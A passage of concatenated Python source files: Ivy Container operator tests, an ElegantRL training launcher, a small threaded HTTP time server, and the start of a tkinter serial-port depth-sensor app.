assert np.allclose(ivy.to_numpy(container.a), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_reverse_scalar_equal_to(device, call):
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container = 2 == container
assert np.allclose(ivy.to_numpy(container["a"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.a), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_equal_to(device, call):
container_a = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([5], device=device),
"d": ivy.array([5], device=device),
},
}
)
container_b = Container(
{
"a": ivy.array([2], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([5], device=device),
},
}
)
container = container_a == container_b
assert np.allclose(ivy.to_numpy(container["a"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.a), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([True]))
def test_container_scalar_not_equal_to(device, call):
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container = container != 2
assert np.allclose(ivy.to_numpy(container["a"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([True]))
def test_container_reverse_scalar_not_equal_to(device, call):
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container = 2 != container
assert np.allclose(ivy.to_numpy(container["a"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([True]))
def test_container_not_equal_to(device, call):
container_a = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([5], device=device),
"d": ivy.array([5], device=device),
},
}
)
container_b = Container(
{
"a": ivy.array([2], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([5], device=device),
},
}
)
container = container_a != container_b
assert np.allclose(ivy.to_numpy(container["a"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_scalar_greater_than(device, call):
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container = container > 2
assert np.allclose(ivy.to_numpy(container["a"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.a), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([True]))
def test_container_reverse_scalar_greater_than(device, call):
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container = 2 > container
assert np.allclose(ivy.to_numpy(container["a"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_greater_than(device, call):
container_a = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([5], device=device),
"d": ivy.array([5], device=device),
},
}
)
container_b = Container(
{
"a": ivy.array([2], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([5], device=device),
},
}
)
container = container_a > container_b
assert np.allclose(ivy.to_numpy(container["a"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.a), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_scalar_greater_than_or_equal_to(device, call):
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container = container >= 2
assert np.allclose(ivy.to_numpy(container["a"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.a), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([True]))
def test_container_reverse_scalar_greater_than_or_equal_to(device, call):
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container = 2 >= container
assert np.allclose(ivy.to_numpy(container["a"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_greater_than_or_equal_to(device, call):
container_a = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([5], device=device),
"d": ivy.array([5], device=device),
},
}
)
container_b = Container(
{
"a": ivy.array([2], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([5], device=device),
},
}
)
container = container_a >= container_b
assert np.allclose(ivy.to_numpy(container["a"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.a), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([True]))
def test_container_scalar_and(device, call):
container = Container(
{
"a": ivy.array([True], device=device),
"b": {
"c": ivy.array([True], device=device),
"d": ivy.array([False], device=device),
},
}
)
container = container & True
# ToDo: work out why "container and True" does not work. Perhaps bool(container)
# is called first implicitly?
assert np.allclose(ivy.to_numpy(container["a"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_reverse_scalar_and(device, call):
container = Container(
{
"a": ivy.array([True], device=device),
"b": {
"c": ivy.array([True], device=device),
"d": ivy.array([False], device=device),
},
}
)
container = True and container
assert np.allclose(ivy.to_numpy(container["a"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_and(device, call):
container_a = Container(
{
"a": ivy.array([True], device=device),
"b": {
"c": ivy.array([True], device=device),
"d": ivy.array([False], device=device),
},
}
)
container_b = Container(
{
"a": ivy.array([False], device=device),
"b": {
"c": ivy.array([True], device=device),
"d": ivy.array([False], device=device),
},
}
)
container = container_a and container_b
assert np.allclose(ivy.to_numpy(container["a"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.a), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_scalar_or(device, call):
container = Container(
{
"a": ivy.array([True], device=device),
"b": {
"c": ivy.array([True], device=device),
"d": ivy.array([False], device=device),
},
}
)
container = container or False
assert np.allclose(ivy.to_numpy(container["a"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_reverse_scalar_or(device, call):
container = Container(
{
"a": ivy.array([True], device=device),
"b": {
"c": ivy.array([True], device=device),
"d": ivy.array([False], device=device),
},
}
)
container = container or False
assert np.allclose(ivy.to_numpy(container["a"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_or(device, call):
container_a = Container(
{
"a": ivy.array([True], device=device),
"b": {
"c": ivy.array([True], device=device),
"d": ivy.array([False], device=device),
},
}
)
container_b = Container(
{
"a": ivy.array([False], device=device),
"b": {
"c": ivy.array([True], device=device),
"d": ivy.array([False], device=device),
},
}
)
container = container_a or container_b
assert np.allclose(ivy.to_numpy(container["a"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_not(device, call):
container = ~Container(
{
"a": ivy.array([True], device=device),
"b": {
"c": ivy.array([True], device=device),
"d": ivy.array([False], device=device),
},
}
)
assert np.allclose(ivy.to_numpy(container["a"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.a), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([True]))
def test_container_scalar_xor(device, call):
if call is helpers.mx_call:
# MXnet arrays do not overload the ^ operator, can add if explicit
# ivy.logical_xor is implemented at some point
pytest.skip()
container = Container(
{
"a": ivy.array([True], device=device),
"b": {
"c": ivy.array([True], device=device),
"d": ivy.array([False], device=device),
},
}
)
container = container != True # noqa
assert np.allclose(ivy.to_numpy(container["a"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.a), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([True]))
def test_container_reverse_scalar_xor(device, call):
if call is helpers.mx_call:
# MXnet arrays do not overload the ^ operator, can add if explicit
# ivy.logical_xor is implemented at some point
pytest.skip()
container = Container(
{
"a": ivy.array([True], device=device),
"b": {
"c": ivy.array([True], device=device),
"d": ivy.array([False], device=device),
},
}
)
container = False != container # noqa
assert np.allclose(ivy.to_numpy(container["a"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_xor(device, call):
if call is helpers.mx_call:
# MXnet arrays do not overload the ^ operator, can add if explicit
# ivy.logical_xor is implemented at some point
pytest.skip()
container_a = Container(
{
"a": ivy.array([True], device=device),
"b": {
"c": ivy.array([True], device=device),
"d": ivy.array([False], device=device),
},
}
)
container_b = Container(
{
"a": ivy.array([False], device=device),
"b": {
"c": ivy.array([True], device=device),
"d": ivy.array([False], device=device),
},
}
)
container = container_a != container_b # noqa
assert np.allclose(ivy.to_numpy(container["a"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_shape(device, call):
dict_in = {
"a": ivy.array([[[1.0], [2.0], [3.0]]], device=device),
"b": {
"c": ivy.array([[[2.0], [4.0], [6.0]]], device=device),
"d": ivy.array([[[3.0], [6.0], [9.0]]], device=device),
},
}
container = Container(dict_in)
assert container.shape == [1, 3, 1]
dict_in = {
"a": ivy.array([[[1.0], [2.0], [3.0]]], device=device),
"b": {
"c": ivy.array([[[2.0, 3.0], [4.0, 5.0], [6.0, 7.0]]], device=device),
"d": ivy.array([[[3.0], [6.0], [9.0]]], device=device),
},
}
container = Container(dict_in)
assert container.shape == [1, 3, None]
dict_in = {
"a": ivy.array([[[1.0, 2.0], [2.0, 3.0], [3.0, 4.0]]], device=device),
"b": {
"c": ivy.array([[[2.0, 3.0], [4.0, 5.0], [6.0, 7.0]]], device=device),
"d": ivy.array([[[3.0, 4.0], [6.0, 7.0], [9.0, 10.0]]], device=device),
},
}
container = Container(dict_in)
assert container.shape == [1, 3, 2]
def test_container_shapes(device, call):
dict_in = {
"a": ivy.array([[[1.0], [2.0], [3.0]]], device=device),
"b": {
"c": ivy.array([[[2.0], [4.0]]], device=device),
"d": ivy.array([[9.0]], device=device),
},
}
container_shapes = Container(dict_in).shapes
assert list(container_shapes["a"]) == [1, 3, 1]
assert list(container_shapes.a) == [1, 3, 1]
assert list(container_shapes["b"]["c"]) == [1, 2, 1]
assert list(container_shapes.b.c) == [1, 2, 1]
assert list(container_shapes["b"]["d"]) == [1, 1]
assert list(container_shapes.b.d) == [1, 1]
def test_container_dev_str(device, call):
dict_in = {
"a": ivy.array([[[1.0], [2.0], [3.0]]], device=device),
"b": {
"c": ivy.array([[[2.0], [4.0], [6.0]]], device=device),
"d": ivy.array([[[3.0], [6.0], [9.0]]], device=device),
},
}
container = Container(dict_in)
assert container.dev_str == device
def test_container_create_if_absent(device, call):
dict_in = {
"a": ivy.array([[[1.0], [2.0], [3.0]]], device=device),
"b": {
"c": ivy.array([[[2.0], [4.0], [6.0]]], device=device),
"d": ivy.array([[[3.0], [6.0], [9.0]]], device=device),
},
}
# depth 1
container = Container(dict_in)
container.create_if_absent("a", None, True)
assert np.allclose(ivy.to_numpy(container.a), np.array([[[1.0], [2.0], [3.0]]]))
container.create_if_absent("e", ivy.array([[[4.0], [8.0], [12.0]]]), True)
assert np.allclose(ivy.to_numpy(container.e), np.array([[[4.0], [8.0], [12.0]]]))
# depth 2
container.create_if_absent("f/g", np.array([[[5.0], [10.0], [15.0]]]), True)
assert np.allclose(ivy.to_numpy(container.f.g), np.array([[[5.0], [10.0], [15.0]]]))
def test_container_if_exists(device, call):
dict_in = {
"a": ivy.array([[[1.0], [2.0], [3.0]]], device=device),
"b": {
"c": ivy.array([[[2.0], [4.0], [6.0]]], device=device),
"d": ivy.array([[[3.0], [6.0], [9.0]]], device=device),
},
}
container = Container(dict_in)
assert np.allclose(
ivy.to_numpy(container.if_exists("a")), np.array([[[1.0], [2.0], [3.0]]])
)
assert "c" not in container
assert container.if_exists("c") is None
container["c"] = ivy.array([[[1.0], [2.0], [3.0]]], device=device)
assert np.allclose(
ivy.to_numpy(container.if_exists("c")), np.array([[[1.0], [2.0], [3.0]]])
)
assert container.if_exists("d") is None
container.d = ivy.array([[[1.0], [2.0], [3.0]]], device=device)
assert np.allclose(
ivy.to_numpy(container.if_exists("d")), np.array([[[1.0], [2.0], [3.0]]])
)
def test_jax_pytree_compatibility(device, call):
if call is not helpers.jnp_call:
pytest.skip()
# import
from jax.tree_util import tree_flatten
# dict in
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
}
# container
container = Container(dict_in)
# container flattened
cont_values = tree_flatten(container)[0]
# dict flattened
true_values = tree_flatten(dict_in)[0]
# assertion
for i, true_val in enumerate(true_values):
assert np.array_equal(ivy.to_numpy(cont_values[i]), ivy.to_numpy(true_val))
def test_container_from_queues(device, call):
if "gpu" in device:
# Cannot re-initialize CUDA in forked subprocess. 'spawn'
# start method must be used.
pytest.skip()
if ivy.gpu_is_available() and call is helpers.jnp_call:
# Not found a way to set default device for JAX, and this causes
# issues with multiprocessing and CUDA, even when device=cpu
# ToDo: find a fix for this problem ^^
pytest.skip()
def worker_fn(in_queue, out_queue, load_size, worker_id):
keep_going = True
while keep_going:
try:
keep_going = in_queue.get(timeout=0.1)
except queue.Empty:
continue
out_queue.put(
{
"a": [
ivy.to_native(ivy.array([1.0, 2.0, 3.0], device=device))
* worker_id
]
* load_size
}
)
workers = list()
in_queues = list()
out_queues = list()
queue_load_sizes = [1, 2, 1]
for i, queue_load_size in enumerate(queue_load_sizes):
input_queue = multiprocessing.Queue()
output_queue = multiprocessing.Queue()
worker = multiprocessing.Process(
target=worker_fn, args=(input_queue, output_queue, queue_load_size, i + 1)
)
worker.start()
in_queues.append(input_queue)
out_queues.append(output_queue)
workers.append(worker)
container = Container(
queues=out_queues, queue_load_sizes=queue_load_sizes, queue_timeout=0.25
)
# queue 0
queue_was_empty = False
try:
container[0]
except queue.Empty:
queue_was_empty = True
assert queue_was_empty
in_queues[0].put(True)
assert np.allclose(ivy.to_numpy(container[0].a), np.array([1.0, 2.0, 3.0]))
assert np.allclose(ivy.to_numpy(container[0].a), np.array([1.0, 2.0, 3.0]))
# queue 1
queue_was_empty = False
try:
container[1]
except queue.Empty:
queue_was_empty = True
assert queue_was_empty
queue_was_empty = False
try:
container[2]
except queue.Empty:
queue_was_empty = True
assert queue_was_empty
in_queues[1].put(True)
assert np.allclose(ivy.to_numpy(container[1].a), np.array([2.0, 4.0, 6.0]))
assert np.allclose(ivy.to_numpy(container[1].a), np.array([2.0, 4.0, 6.0]))
assert np.allclose(ivy.to_numpy(container[2].a), np.array([2.0, 4.0, 6.0]))
assert np.allclose(ivy.to_numpy(container[2].a), np.array([2.0, 4.0, 6.0]))
# queue 2
queue_was_empty = False
try:
container[3]
except queue.Empty:
queue_was_empty = True
assert queue_was_empty
in_queues[2].put(True)
assert np.allclose(ivy.to_numpy(container[3].a), np.array([3.0, 6.0, 9.0]))
assert np.allclose(ivy.to_numpy(container[3].a), np.array([3.0, 6.0, 9.0]))
# stop workers
in_queues[0].put(False)
in_queues[1].put(False)
in_queues[2].put(False)
in_queues[0].close()
in_queues[1].close()
in_queues[2].close()
# join workers
for worker in workers:
worker.join()
del container
|
run.py
|
import os
import sys
import time
import torch
import shutil
from elegantrl.train.utils import init_agent, init_evaluator, init_replay_buffer
from elegantrl.train.utils import server_leaderboard, PipeEvaluator
from elegantrl.train.config import build_env
from elegantrl.train.worker import PipeWorker
from elegantrl.train.learner import PipeLearner
def train_and_evaluate(args):
args.init_before_training() # necessary!
learner_gpu = args.learner_gpus[0]
env = build_env(env=args.env, env_func=args.env_func, env_args=args.env_args, gpu_id=learner_gpu)
agent = init_agent(args, gpu_id=learner_gpu, env=env)
evaluator = init_evaluator(args, agent_id=0)
buffer, update_buffer = init_replay_buffer(args, learner_gpu, agent, env=env)
"""start training"""
cwd = args.cwd
break_step = args.break_step
batch_size = args.batch_size
target_step = args.target_step
repeat_times = args.repeat_times
if_allow_break = args.if_allow_break
soft_update_tau = args.soft_update_tau
del args
'''start training loop'''
if_train = True
torch.set_grad_enabled(False)
while if_train:
traj_list = agent.explore_env(env, target_step)
steps, r_exp = update_buffer(traj_list)
torch.set_grad_enabled(True)
logging_tuple = agent.update_net(buffer, batch_size, repeat_times, soft_update_tau)
torch.set_grad_enabled(False)
if_reach_goal, if_save = evaluator.evaluate_and_save(agent.act, steps, r_exp, logging_tuple)
if_train = not ((if_allow_break and if_reach_goal)
or evaluator.total_step > break_step
or os.path.exists(f'{cwd}/stop'))
print(f'| UsedTime: {time.time() - evaluator.start_time:>7.0f} | SavedDir: {cwd}')
agent.save_or_load_agent(cwd, if_save=True)
buffer.save_or_load_history(cwd, if_save=True) if agent.if_off_policy else None
evaluator.save_or_load_recoder(if_save=True)
def train_and_evaluate_mp(args, python_path=''):
import multiprocessing as mp
if_from_ensemble = sys.argv[-1] == 'FromEnsemble'
agent_id = int(sys.argv[-2]) if if_from_ensemble else 0
from collections.abc import Iterable
if isinstance(args.learner_gpus, int):
args.learner_gpus = (args.learner_gpus, )
if (not isinstance(args.learner_gpus[0], Iterable)) or if_from_ensemble:
args.init_before_training(agent_id=agent_id) # necessary!
process = list()
mp.set_start_method(method='spawn', force=True) # force all the multiprocessing to 'spawn' methods
'''evaluator'''
evaluator_pipe = PipeEvaluator(save_gap=args.save_gap, save_dir=args.save_dir)
process.append(mp.Process(target=evaluator_pipe.run, args=(args, agent_id)))
learner_pipe = PipeLearner(args.learner_gpus)
for learner_id in range(len(args.learner_gpus)):
'''explorer'''
worker_pipe = PipeWorker(args.env_num, args.worker_num)
process.extend([mp.Process(target=worker_pipe.run, args=(args, worker_id, learner_id))
for worker_id in range(args.worker_num)])
'''learner'''
evaluator_temp = evaluator_pipe if learner_id == 0 else None
process.append(mp.Process(target=learner_pipe.run, args=(args, evaluator_temp, worker_pipe, learner_id)))
[(p.start(), time.sleep(0.1)) for p in process]
process[0].join()
process_safely_terminate(process)
else:
from subprocess import Popen
python_path = python_path if python_path else get_python_path()
python_proc = sys.argv[0]
ensemble_dir = args.save_dir
ensemble_num = len(args.learner_gpus)
shutil.rmtree(ensemble_dir, ignore_errors=True)
os.makedirs(ensemble_dir, exist_ok=True)
proc_leaderboard = mp.Process(target=server_leaderboard, args=(ensemble_num, ensemble_dir))
proc_leaderboard.start()
print('subprocess Start')
process = list()
for agent_id in range(ensemble_num):
command_str = f"{python_path} {python_proc} {agent_id} FromEnsemble"
command_list = command_str.split(' ')
process.append(Popen(command_list))
for proc in process:
proc.communicate()
print('subprocess Stop')
proc_leaderboard.join()
'''private utils'''
def get_python_path(): # useless
from subprocess import check_output
python_path = check_output("which python3", shell=True).strip()
python_path = python_path.decode('utf-8')
print(f"| get_python_path: {python_path}")
return python_path
def process_safely_terminate(process):
for p in process:
try:
p.kill()
except OSError as e:
print(e)
pass
def check_subprocess():
import subprocess
timer = time.time()
print('subprocess Start')
process = [subprocess.Popen(f"sleep 3".split(' ')) for _ in range(4)]
[proc.communicate() for proc in process]
print('subprocess Stop:', time.time() - timer)
|
http_server__threading.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
# SOURCE: http://andreymal.org/socket3/
import time
import socket
from threading import Thread
def send_answer(conn, status="200 OK", typ="text/plain; charset=utf-8", data=""):
data = data.encode("utf-8")
conn.send(b"GET HTTP/1.1 " + status.encode("utf-8") + b"\r\n")
conn.send(b"Server: simplehttp\r\n")
conn.send(b"Connection: close\r\n")
conn.send(b"Content-Type: " + typ.encode("utf-8") + b"\r\n")
conn.send(b"Content-Length: " + str(len(data)).encode() + b"\r\n")
conn.send(b"\r\n") # После пустой строки в HTTP начинаются данные
conn.send(data)
def parse(conn): # Обработка соединения в отдельной функции
try:
data = b""
while b"\r\n" not in data: # Ждём первую строку
tmp = conn.recv(1024)
# Сокет закрыли, пустой объект
if not tmp:
break
else:
data += tmp
# Данные не пришли
if not data:
return
udata = data.decode("utf-8")
# берём только первую строку
udata = udata.split("\r\n", 1)[0]
# разбиваем по пробелам нашу строку
method, address, protocol = udata.split(" ", 2)
# if method != "GET" or address != "/time.html":
# send_answer(conn, "404 Not Found", data="Не найдено")
# return
answer = """<!DOCTYPE html>"""
answer += """<html><head><title>Время</title></head><body><h1>"""
answer += time.strftime("%H:%M:%S %d.%m.%Y")
answer += """</h1></body></html>"""
send_answer(conn, typ="text/html; charset=utf-8", data=answer)
except:
send_answer(conn, "500 Internal Server Error", data="Ошибка")
finally:
conn.close()
HOST = 'localhost'
PORT = 9090
if __name__ == '__main__':
sock = socket.socket()
print('Socket created')
sock.bind((HOST, PORT))
print('Socket bind complete')
sock.listen()
print('Socket now listening: http://{}:{}'.format(*sock.getsockname()))
print()
try:
# Работаем постоянно
while True:
conn, addr = sock.accept()
print("New connection from " + addr[0])
thread = Thread(target=parse, args=[conn])
thread.start()
finally:
sock.close()
|
app.py
|
# -*- coding: utf-8 -*-
"""
Created on Thu Apr 12 01:39:31 2021
@author: amannirala13
"""
# Library import block
import serial
import numpy as np
import os
try:
import tkinter as tk
except:
import Tkinter as tk
import time
import threading
from datetime import datetime, timedelta
#-------------------------------------------
class App(tk.Frame):
def __init__(self,root, *args, **kwargs):
tk.Frame.__init__(self,root, *args, **kwargs)
self.root = root
self.mainCalibration = self.Calibrate()
self.IS_DETECTION_ON = False
self.depthSensitivity = 0.0
self.SMS_ONGOING = False
self.smsEndTime = datetime.now()
tk.Label(self.root, text="COM Port: ").grid(row=0, pady = 10)
tk.Label(self.root, text="Baud Rate: ").grid(row=0, column=2, pady = 10)
tk.Label(self.root, text="Depth Sensitivity(cm): ").grid(row=1, pady = 10)
tk.Label(self.root, text="Max Distance Allowed(cm): ").grid(row=2, pady = 10)
tk.Label(self.root, text="Calibration Time(s): ").grid(row=4, pady = 10)
self.comPortTextField = tk.Entry(self.root, bg='#CFD8DC')
self.baudrateTextField = tk.Entry(self.root, bg='#CFD8DC')
self.depthTextField = tk.Entry(self.root, bg='#CFD8DC')
self.maxDistanceField = tk.Entry(self.root, bg='#CFD8DC')
self.calibrationTimeTextField = tk.Entry(self.root, bg='#CFD8DC')
self.calibrateBtn = tk.Button(self.root, text="Calibrate",width = 25, bg='#FFEE58', height=2)
self.startBtn = tk.Button(self.root, text="Start detection", width = 25, bg='#66BB6A', height=2)
self.showGraphBtn = tk.Button(self.root, text="Show Graph", width = 25, bg='#29B6F6', height=2)
self.saveComConfigBtn = tk.Button(self.root, text="Save COM Config", width = 25,bg='#9575CD' ,height = 2)
self.comPortTextField.grid(row=0,column=1, pady = 10)
self.baudrateTextField.grid(row=0, column=3, pady = 10, padx=10)
self.depthTextField.grid(row=1, column=1, pady = 10)
self.maxDistanceField.grid(row=2, column=1, pady = 10)
self.calibrationTimeTextField.grid(row=4, column=1, pady = 10)
self.calibrateBtn.grid(row=5)
self.startBtn.grid(row=5, column=1)
self.showGraphBtn.grid(row = 5, column=2, columnspan=2,ipadx=10)
self.saveComConfigBtn.grid(row=3, column=2, columnspan=2, rowspan=2,ipadx=10)
try:
comConfigFile = open('com.config', 'r')
config = comConfigFile.read().split(':')
if(len(config) == 2):
self.com = config[0]
self.baudrate = int(config[1])
self.comPortTextField.insert(0,self.com)
self.serialPort = serial.Serial(port = self.com, baudrate=self.baudrate)
self.baudrateTextField.insert(0,self.baudrate)
else:
self.com = None
self.baudrate = 9600
self.baudrateTextField.insert(0,self.baudrate)
self.serialPort = serial.Serial()
comConfigFile.close()
except IOError as e:
print(e)
self.com = None
self.baudrate = 9600
self.baudrateTextField.insert(0,self.baudrate)
self.serialPort = serial.Serial()
self.calibrateBtn.config(command=lambda:threading.Thread(target=self.startCalibration, daemon=True).start())
self.startBtn.config(command=lambda:threading.Thread(target=self.startDetection, daemon=True).start())
#self.startBtn.config(command= self.startDetection)
self.showGraphBtn.config(command=lambda:threading.Thread(target= lambda: os.system('python graph.py log.data '+str(self.mainCalibration.surface_threshold), ),daemon=True).start())
self.saveComConfigBtn.config(command=lambda:threading.Thread(target=self.saveCOMConfig).start())
class Calibrate():
def __init__(self):
self.surface_normal = 0.0
self.max_error = 0.0
self.min_error = 0.0
self.mean_error = 0.0
self.max_distance = 0.0
self.surface_max_distance = 0.0
self.surface_min_distance = 0.0
self.surface_threshold = 0.0
self.is_calibrated = False
def startSerialPortCom(self):
print("STATUS: Starting communication with serial port...")
self.baudrate = int(self.baudrateTextField.get())
if self.serialPort.port == None:
self.com = self.comPortTextField.get()
self.serialPort = serial.Serial(port=self.com, baudrate=self.baudrate)
else:
self.serialPort.open()
def stopSerialPortCom(self):
print("STATUS: Stopping communication with serial port...")
try:
self.serialPort.close()
